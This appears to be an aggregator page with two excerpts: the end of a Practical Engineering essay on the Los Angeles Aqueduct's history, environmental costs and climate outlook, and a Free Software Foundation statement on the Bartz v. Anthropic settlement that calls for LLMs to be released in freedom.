For most of Los Angeles’ history, that “finished water storage” was out in the open air. But in the 2000s, drinking-water rules pushed utilities to add stronger protection for treated water held in uncovered reservoirs. There’s a good chance you’ve seen their solution on the Veritasium channel or elsewhere: 96 million plastic shade balls that act like a floating cover, blocking sunlight to prevent water-chemistry problems and helping keep wildlife out. They’re the final protection for this water that traveled so long to reach the city. While the LA Reservoir is, in a sense, the end of the journey for this water, the original diversion way back at the Owens River isn’t even technically the start anymore!
In 1940, LA extended the aqueduct system upstream northward by connecting the Mono basin and funneling its water through tunnels to the Owens River basin. Like Owens Lake downstream, Mono Lake began drying out as well. And also like Owens Lake, lawsuits, court orders, and environmental regulations have tempered the value of this water source, forcing LA to significantly reduce diversions and implement costly restoration projects.
That’s kind of the story of the LA aqueduct in a nutshell. The project seemed obvious from an engineering perspective. There was lots of snowmelt in the mountains; the city had the technical prowess, the funding, the elevation, and the political power to reach out and take it. The result was one of the most impressive works of infrastructure of the early 20th century. And continued efforts to expand and improve the system have made it even more efficient, flexible, and valuable to the many millions of people who live in one of the most populous cities in America, delivering not only water but also hundreds of megawatts of hydropower.
But in many ways, it was not only unscrupulous but also short-sighted. Residents of the Owens Valley watched ranchland and farmland dry up as the water that had shaped their home was rerouted south. Native communities saw their homeland transformed, with access to gathering areas disrupted, places made unrecognizable, and cultural ties strained by changes they didn’t choose. Wind picked up alkaline dust from dried lakebeds. Habitats were disrupted, and the birds that depended on these waters and wetlands lost part of what made this migration corridor work. It’s easy to see why the aqueduct remains controversial, and why what we sometimes dismiss as “red tape” around major infrastructure is often completely justified due diligence. As engineers, and really, as humans, we have to try to account for costs that don’t show up on a balance sheet, but can come back later as decades of lawsuits, mitigation, and restoration.
And even the aqueduct’s original thesis (that there’s reliable snowmelt up there, and a growing city down here) is starting to falter. In recent decades, the mountains have delivered less predictable runoff: more swings, more years when the timing is wrong, and more uncertainty about what “normal” even means anymore. California’s climate has always moved in long cycles, but the margin for error is thinner now, and no one can say with much confidence when or if the moisture the state depends on will return to its old pattern.
The hopeful part is that this is exactly where engineering makes a difference: at the messy intersection of geology, climate, culture, politics, and human need. The Los Angeles Aqueduct is a case study in what we can build when we’re ambitious, but also what happens when we treat a landscape like a machine with only one output. The next era of water engineers can learn a lot from it.
...
Read the original on practical.engineering »
The Free Software Foundation (FSF), like many others, received a notice regarding settlement in the copyright infringement lawsuit Bartz v. Anthropic. It is a class action lawsuit claiming that Anthropic infringed copyright by downloading works in Library Genesis and Pirate Library Mirror datasets for purposes of training large language models (LLMs). According to the notice, the district court ruled that using the books to train LLMs was fair use but left for trial the question of whether downloading them for this purpose was legal. Apparently, the parties agreed to settle instead of waiting for the trial and they are now reaching out to potential copyright holders to offer money in lieu of potential damages.
The FSF holds copyrights to many programs in the GNU Project, as well as to several books. We publish all works that we hold copyrights to under free (as in freedom) licenses. Among the works we hold copyrights over is Sam Williams and Richard Stallman’s Free as in freedom: Richard Stallman’s crusade for free software, which was found in datasets used by Anthropic as training inputs for their LLMs. It was published by O’Reilly and by the FSF under the GNU Free Documentation License (GNU FDL). This is a free license allowing use of the work for any purpose without payment.
Obviously, the right thing to do is protect computing freedom: share complete training inputs with every user of the LLM, together with the complete model, training configuration settings, and the accompanying software source code. Therefore, we urge Anthropic and other LLM developers that train models using huge datasets downloaded from the Internet to provide these LLMs to their users in freedom. We are a small organization with limited resources and we have to pick our battles, but if the FSF were to participate in a lawsuit such as Bartz v. Anthropic and find our copyright and license violated, we would certainly request user freedom as compensation.
...
Read the original on www.fsf.org »